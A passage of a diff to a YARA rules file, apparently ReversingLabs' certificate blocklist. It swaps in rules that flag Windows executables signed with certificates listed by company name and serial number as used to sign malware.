75 quality = 90 tags = "INFO, FILE" @@ -20812,22 +40603,22 @@ rule REVERSINGLABS_Cert_Blocklist_1Dabae616705F5A51152Eac48423F354 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="1d:ab:ae:61:67:05:f5:a5:11:52:ea:c4:84:23:f3:54" and 1470960000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Diamartis" and pe.signatures[i].serial=="7f:ba:0e:19:91:9a:c5:0d:70:0b:a6:02:50:d0:2c:8b" and 1623196800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_50D08F3C9Bf86Fba52Cf592B4Fe6Eacf : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_A758504E7971869D0Aec2775Fffa03D5 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f315cdda-4b95-534d-94db-9a04e2da6385" + id = "cc8c0cca-1848-5a5e-a421-c5ecdea6ba53" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14932-L14948" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ca613e4b45b9bb1ef7564b9fc6321bccc0f683298de692a3db2bf841db9010ef" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9038-L9056" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "dcb1ac4c7dcbebd0a432515da82e4a97be6c6c2a54f9d642aa8c1a2bcbdce5de" score = 75 quality = 90 tags = "INFO, FILE" @@ -20837,22 +40628,22 @@ rule REVERSINGLABS_Cert_Blocklist_50D08F3C9Bf86Fba52Cf592B4Fe6Eacf : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CLEVERCYBER LTD" and pe.signatures[i].serial=="50:d0:8f:3c:9b:f8:6f:ba:52:cf:59:2b:4f:e6:ea:cf" and 1518134400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Amcert LLC" and (pe.signatures[i].serial=="00:a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5" or pe.signatures[i].serial=="a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5") and 1623628800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7C7Fc3616F3157A28F702Cc1Df275Dcd : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_37A67Cf754Ee5Ae284B4Cf8B9D651604 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "78d2adb9-fc1c-5f48-80cb-3f1bd12b6ba5" + id = "e85434e1-1ef5-5660-8ba6-b35cbbe7510d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14950-L14966" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c2dcea21c7a3e3aef6408f11c23edbce6d8f655f298654552a607a9b0caabb28" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9058-L9074" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "22cb71eebbb212a4436847c11c7ca9cefaf118086b024014c12498a6a5953af5" score = 75 quality = 90 tags = "INFO, FILE" @@ -20862,22 +40653,22 @@ rule REVERSINGLABS_Cert_Blocklist_7C7Fc3616F3157A28F702Cc1Df275Dcd : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CFES Projects Ltd" and pe.signatures[i].serial=="7c:7f:c3:61:6f:31:57:a2:8f:70:2c:c1:df:27:5d:cd" and 1522972800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FORTH PROPERTY LTD" and pe.signatures[i].serial=="37:a6:7c:f7:54:ee:5a:e2:84:b4:cf:8b:9d:65:16:04" and 1617321600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_73Ed1B2F4Bf8Dd37A8Ad9Bb775774592 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_119Acead668Bad57A48B4F42F294F8F0 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "19c9e100-b017-5b5c-8e8f-c94ea9e228c2" + id = "7ec33498-b299-58e0-be42-9e4fb9549e28" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14968-L14984" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "69865935e07ea255a5d690e170911b33574ea61550b00bebc2ceff91ba9a33da" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9076-L9092" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "61c49c60fc4fd5d654a6376fcee43e986a5351f085a5652a3c8888774557e053" score = 75 quality = 90 tags = "INFO, FILE" @@ -20887,22 +40678,22 @@ rule REVERSINGLABS_Cert_Blocklist_73Ed1B2F4Bf8Dd37A8Ad9Bb775774592 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "5000 LIMITED" and pe.signatures[i].serial=="73:ed:1b:2f:4b:f8:dd:37:a8:ad:9b:b7:75:77:45:92" and 1528243200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PB03 TRANSPORT LTD." and pe.signatures[i].serial=="11:9a:ce:ad:66:8b:ad:57:a4:8b:4f:42:f2:94:f8:f0" and 1619654400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_211B5Dfe65Bc6F34Bc9D3A54 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7A6D30A6Eb2Fa0C3369283725704Ac4C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5181b6e4-6a25-58f6-88c5-0eae98250648" + id = "b7830a3a-ddcc-54ef-84dd-5d4b13863f90" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14986-L15002" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cf2e4c0dd98efb77c28b63641196c83e60afc0d6ab64802743c351581506dbb5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9094-L9110" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "788abb53ed7974d87c1b1bdbe31dcd3e852ea64745d94780d78d1217ee0206fe" score = 75 quality = 90 tags = "INFO, FILE" @@ -20912,22 +40703,22 @@ rule REVERSINGLABS_Cert_Blocklist_211B5Dfe65Bc6F34Bc9D3A54 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RAFO TECHNOLOGY INC" and pe.signatures[i].serial=="21:1b:5d:fe:65:bc:6f:34:bc:9d:3a:54" and 1526717931<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Trade By International ApS" and pe.signatures[i].serial=="7a:6d:30:a6:eb:2f:a0:c3:36:92:83:72:57:04:ac:4c" and 1619568000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5400D1C1406528B1Ef625976 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_670C3494206B9F0C18714Fdcffaaa42F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2b35f2db-ebf1-5533-858c-644dbd6dfb2b" + id = "210a0c72-7eb7-5c78-bf5b-1ac292e7fa11" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15004-L15020" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fbdd37e050d68c4287e897f050a673aea071df105a35b07475d3233da3f03feb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9112-L9128" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3b1e244b5f543a05beb2475020aa20dfc723f4dce3a5a0a963db1672d3295721" score = 75 quality = 90 tags = "INFO, FILE" @@ -20937,22 +40728,22 @@ rule REVERSINGLABS_Cert_Blocklist_5400D1C1406528B1Ef625976 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="54:00:d1:c1:40:65:28:b1:ef:62:59:76" and 1474266628<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ADRIATIK PORT SERVIS, d.o.o." and pe.signatures[i].serial=="67:0c:34:94:20:6b:9f:0c:18:71:4f:dc:ff:aa:a4:2f" and 1622160000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_013472D7D665557Bfa0Dc21B350A361B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0E8Aa328Af207Ce8Bcae1Dc15C626188 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9b63f06d-9808-5936-aad2-d387c74eccdd" + id = "9718f290-6ecd-5d67-9013-af99f98fffef" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15022-L15038" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ab908ef0fca56753bcba8bc85e2fdf5859b4e226c179ec5c6eb6eb3dc4014a8e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9130-L9146" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4022abb8efbda944e35ff529c5b3b3c9f6370127a945f3eec1310149bb5d06e4" score = 75 quality = 90 tags = "INFO, FILE" @@ -20962,22 +40753,22 @@ rule REVERSINGLABS_Cert_Blocklist_013472D7D665557Bfa0Dc21B350A361B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yongli Zhang" and pe.signatures[i].serial=="01:34:72:d7:d6:65:55:7b:fa:0d:c2:1b:35:0a:36:1b" and 1470960000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PRO SAT SRL" and pe.signatures[i].serial=="0e:8a:a3:28:af:20:7c:e8:bc:ae:1d:c1:5c:62:61:88" and 1627344000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_66C758A22Bfbbce327616815616Ddd07 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Cfad6Be1D823B4Eacb803B720F525A7D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4a7130ad-8b66-52a1-afd2-6d10776b4451" + id = "844e295f-b22f-5eb0-9f98-0d6e574d2954" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15040-L15056" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "37f0f64e2d84ef6591e1f07a05abca35b37827d26c828269fb5f38d8546a60a7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9148-L9166" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d8005774e6011d8198039a6588834cd0b13dd728103b63c3ea8b6e0dc3878f05" score = 75 quality = 90 tags = "INFO, FILE" @@ -20987,22 +40778,22 @@ rule REVERSINGLABS_Cert_Blocklist_66C758A22Bfbbce327616815616Ddd07 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TIM Konstrakshn, TOV" and pe.signatures[i].serial=="66:c7:58:a2:2b:fb:bc:e3:27:61:68:15:61:6d:dd:07" and 1469404800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Sistema LLC" and (pe.signatures[i].serial=="00:cf:ad:6b:e1:d8:23:b4:ea:cb:80:3b:72:0f:52:5a:7d" or pe.signatures[i].serial=="cf:ad:6b:e1:d8:23:b4:ea:cb:80:3b:72:0f:52:5a:7d") and 1627430400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_E61B0366D940896430Bcfe3E93Baac5B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7Ebcb54B7E0E6410B28610De0743D4Dd : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "24eb38c1-48a5-5d9b-a42d-345c4fda6c36" + id = "84140bbd-23a0-5355-9d1a-918cc93c3352" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15058-L15076" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1b1fd0c2237446ab22c7359d1e89d822a4b9b6ad345447740154d7d52635c2ea" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9168-L9184" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c9444ff9e13192bf300afac12554bc4cc2defb37bb5b57906b6163db378c515a" score = 75 quality = 90 tags = "INFO, FILE" @@ -21012,22 +40803,22 @@ rule REVERSINGLABS_Cert_Blocklist_E61B0366D940896430Bcfe3E93Baac5B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TRANS LTD" and (pe.signatures[i].serial=="00:e6:1b:03:66:d9:40:89:64:30:bc:fe:3e:93:ba:ac:5b" or pe.signatures[i].serial=="e6:1b:03:66:d9:40:89:64:30:bc:fe:3e:93:ba:ac:5b") and 1528156800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SIA \"MWorx\"" and pe.signatures[i].serial=="7e:bc:b5:4b:7e:0e:64:10:b2:86:10:de:07:43:d4:dd" and 1625616000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6294B8Acc35Dea7D32A95Ac5D4536F8F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_01106Cc293772Ca905A2B6Eff02Bf0F5 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "bc380123-20fc-55de-ad1c-4f13ac173cc9" + id = "1ec81090-91a1-5019-be91-14f60d6722fc" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15078-L15094" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ac92ff8e533121071a620ca5280ae66629576f9c4af9831ddac5bb487e4348af" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9186-L9202" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "81e19c06de4546a2cee974230ef7aa15291f20f2e6b6f89c9b12107c26836b5e" score = 75 quality = 90 tags = "INFO, FILE" @@ -21037,22 +40828,22 @@ rule REVERSINGLABS_Cert_Blocklist_6294B8Acc35Dea7D32A95Ac5D4536F8F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE9\\x87\\x8D\\xE5\\xBA\\x86\\xE6\\x8E\\xA2\\xE9\\x95\\xBF\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="62:94:b8:ac:c3:5d:ea:7d:32:a9:5a:c5:d4:53:6f:8f" and 1517443200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DMR Consulting Ltd." and pe.signatures[i].serial=="01:10:6c:c2:93:77:2c:a9:05:a2:b6:ef:f0:2b:f0:f5" and 1627084800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_485E4626C32493C16283Cfd9E30D17Ad : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_05Bb162F6Efe852B7Bd4712Fd737A61E : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7e6834e5-ce32-5ba6-82cf-99d7b90fb4f0" + id = "82b2198e-140a-54d0-afa8-ad89980c7899" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15096-L15112" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "faf860786e8473493d24abf6e61cf0b906e98d786516be6d2098181368214020" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9204-L9220" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d2fcbce0826c1478338827376d2c7869e5b38dc6d5e737a2f986600c6f71b1e6" score = 75 quality = 90 tags = "INFO, FILE" @@ -21062,22 +40853,22 @@ rule REVERSINGLABS_Cert_Blocklist_485E4626C32493C16283Cfd9E30D17Ad : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="48:5e:46:26:c3:24:93:c1:62:83:cf:d9:e3:0d:17:ad" and 1473292800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Wellpro Impact Solutions Oy" and pe.signatures[i].serial=="05:bb:16:2f:6e:fe:85:2b:7b:d4:71:2f:d7:37:a6:1e" and 1628726400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_D0312F9177Cd46B943Df3Ef22Db4608B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6171990Ba1C8E71049Ebb296A35Bd160 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b36ba3c9-4a64-505a-ae27-ec8ee969dc29" + id = "f81697ca-e49a-5a3d-9e0f-6192159e098b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15114-L15132" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2eb955e91c927980cee031c6284e48bad315e891c32cdaf41b844090e841c44d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9222-L9238" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e922bb850b7c5c70db80e6a2b99310eac48d3b10b94a7259899facd681916bfa" score = 75 quality = 90 tags = "INFO, FILE" @@ -21087,22 +40878,22 @@ rule REVERSINGLABS_Cert_Blocklist_D0312F9177Cd46B943Df3Ef22Db4608B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "United Systems Technology, Inc." and (pe.signatures[i].serial=="00:d0:31:2f:91:77:cd:46:b9:43:df:3e:f2:2d:b4:60:8b" or pe.signatures[i].serial=="d0:31:2f:91:77:cd:46:b9:43:df:3e:f2:2d:b4:60:8b") and 1341273600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OWLNET LIMITED" and pe.signatures[i].serial=="61:71:99:0b:a1:c8:e7:10:49:eb:b2:96:a3:5b:d1:60" and 1620000000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_202702 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_2114Ca3Bd2Afd63D7Fa29D744992B043 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "befb8867-37d6-5b0a-9801-c069b92f8edc" + id = "7d112cb8-a29f-5560-9c3c-cd8891623d96" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15134-L15150" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bc097e97c1c4c4a71cbf66be811636fecfa23682cb2cc47ab1fcd680a646fb14" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9240-L9256" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "241fe5a9f233fa36a665d22b38fd360bee21bc9832c15ac9c9d9b17adc3bb306" score = 75 quality = 90 tags = "INFO, FILE" @@ -21112,22 +40903,22 @@ rule REVERSINGLABS_Cert_Blocklist_202702 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RDCTO Ltd" and pe.signatures[i].serial=="20:27:02" and 1087391361<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MATCH CONSULTANTS LTD" and pe.signatures[i].serial=="21:14:ca:3b:d2:af:d6:3d:7f:a2:9d:74:49:92:b0:43" and 1625097600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_369A02E5D90B2649040E7F87 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6Aaa62208A3A78Bfac1443007D031E61 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2b81466f-3eb1-5c12-8878-9257dde968fb" + id = "dd6dca76-ff5b-51a8-9318-20a88eb44ffb" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15152-L15168" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e2a2e231914f166410580a42ca9d4aac18c5cba94d1f11d22e7acd6d375851d8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9258-L9274" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7ba7f69514230fe636efc0a12fb9ac489a5a80ca1f5bcdb050dd30ee8f69659c" score = 75 quality = 90 tags = "INFO, FILE" @@ -21137,22 +40928,22 @@ rule REVERSINGLABS_Cert_Blocklist_369A02E5D90B2649040E7F87 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="36:9a:02:e5:d9:0b:26:49:04:0e:7f:87" and 1479094204<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Solar LLC" and pe.signatures[i].serial=="6a:aa:62:20:8a:3a:78:bf:ac:14:43:00:7d:03:1e:61" and 1608163200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_60497070Ff4A83Bc87Bdea24Da5B431D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_09450B8F73Ea43E39D2Cdd56049Dbe40 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "510ab702-103b-5863-ac9a-46a917879e72" + id = "e6914a29-f6f7-56fc-8606-95666d31cf33" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15170-L15186" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "30998e3f5299a37cdee83b1232249b84dbb3c154ef99237da5ce1b16f9db5da3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9276-L9292" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "22b344b8befc00b0154d225603c81c6058399770f54cb6a09d0f7908c5c8188c" score = 75 quality = 90 tags = "INFO, FILE" @@ -21162,22 +40953,22 @@ rule 